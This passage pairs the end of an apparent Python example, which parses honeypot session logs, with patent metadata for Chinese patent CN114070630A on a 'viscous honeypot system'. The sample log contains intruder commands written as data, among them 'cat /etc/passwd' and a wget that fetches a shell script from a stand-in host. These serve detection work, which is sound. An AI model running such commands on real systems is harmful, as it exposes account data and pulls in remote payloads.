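2021-11-17T10:00:05 203.0.113.7 ttl=52 CMD uname -a
2021-11-17T10:00:09 203.0.113.7 ttl=52 CMD cat /etc/passwd
2021-11-17T10:00:20 203.0.113.7 ttl=52 CMD wget http://example.invalid/x.sh
2021-11-17T10:01:30 203.0.113.7 ttl=52 SESSION_END
2021-11-17T10:02:00 198.51.100.9 ttl=4 SESSION_START
2021-11-17T10:02:01 198.51.100.9 ttl=3 CMD id
garbage line that the probe could not parse
""".splitlines()

if __name__ == "__main__":
    for rec in build_records(SAMPLE_LOG).values():
        print(rec.ip, rec.duration_seconds, rec.sensitive_commands, rec.disconnect)
```

In this shape the records map directly onto the MySQL rows of the data storage module, and the `disconnect` property is the condition the network termination switch would act on; in a real deployment the thresholds and patterns would be tuned per decoy service rather than fixed as here.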

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202111365005.0A CN114070630A (en) 2021-11-17 2021-11-17 Viscous honeypot system and interaction method thereof

Publications (1)

Publication Number Publication Date
CN114070630A true CN114070630A (en) 2022-02-18

Family

ID=80277993

Country Status (1)

Country Link
CN (1) CN114070630A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN115001875A (en) * 2022-08-05 2022-09-02 上海斗象信息科技有限公司 Honeypot-based network trapping method, device, server and storage medium
CN115174218A (en) * 2022-07-04 2022-10-11 云南电网有限责任公司 Method for carrying out power grid safety protection based on high-simulation virtual honeypot technology
CN116318824A (en) * 2023-01-09 2023-06-23 广州云峰信息科技有限公司 Web attack trapping system

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103139184A (en) * 2011-12-02 2013-06-05 中国电信股份有限公司 Intelligent network firewall device and network attack protection method
CN104978519A (en) * 2014-10-31 2015-10-14 哈尔滨安天科技股份有限公司 Implementation method and device of application-type honeypot
CN106789865A (en) * 2016-07-14 2017-05-31 深圳市永达电子信息股份有限公司 A kind of network safety protection method based on GRE network integration SDN technologies and Honeypot Techniques
US20170331858A1 (en) * 2016-05-10 2017-11-16 Quadrant Information Security Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures
CN111083117A (en) * 2019-11-22 2020-04-28 上海交通大学 Botnet tracking and tracing system based on honeypots
CN111641620A (en) * 2020-05-21 2020-09-08 黄筱俊 Novel cloud honeypot method and framework for detecting evolution DDoS attack
CN113364750A (en) * 2021-05-26 2021-09-07 浙江工业大学 Method for inducing APT attack to introduce honeypots based on Snort and OpenFlow heuristic method

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination